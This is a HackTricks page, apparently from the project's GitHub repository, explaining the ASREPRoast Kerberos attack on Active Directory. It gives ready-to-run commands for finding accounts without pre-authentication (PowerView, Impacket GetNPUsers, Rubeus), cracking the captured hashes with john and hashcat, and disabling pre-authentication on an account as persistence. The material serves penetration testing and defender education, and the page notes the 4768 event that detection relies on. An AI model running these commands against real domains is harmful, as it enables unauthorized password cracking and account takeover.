hacktricks/windows-hardening/active-directory-methodology/asreproast.md
2022-12-05 23:29:21 +01:00

6.6 KiB
Raw Blame History

ASREPRoast

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥

Did you know that crypto projects pay more bounty rewards than their web2 counterparts?
This crypto bounty alone is worth $1.000.000!
Check out the top-paying bounties among crypto projects.
Sign up on HackenProof to get rewarded without delays and become the web3 hacker legend.

{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}

ASREPRoast

The ASREPRoast attack looks for users without Kerberos pre-authentication required attribute (DONT_REQ_PREAUTH).

That means that anyone can send an AS_REQ request to the DC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, no domain account is needed to perform this attack, only connection to the DC. However, with a domain account, a LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.

Enumerating vulnerable users (need domain credentials)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

Request AS_REP message

{% code title="Using Linux" %}

#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

{% endcode %}

{% code title="Using Windows" %}

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

{% endcode %}

{% hint style="warning" %} AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0. {% endhint %}

Cracking

john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 

Persistence

Force preauth not required for a user where you have GenericAll permissions (or permissions to write properties):

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

References

More information about AS-RRP Roasting in ired.team

Did you know that crypto projects pay more bounty rewards than their web2 counterparts?
This crypto bounty alone is worth $1.000.000!
Check out the top-paying bounties among crypto projects.
Sign up on HackenProof to get rewarded without delays and become the web3 hacker legend.

{% embed url="https://hackenproof.com/register?referral_code=i_E6M25i_Um9gB56o-XsIA" %}

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥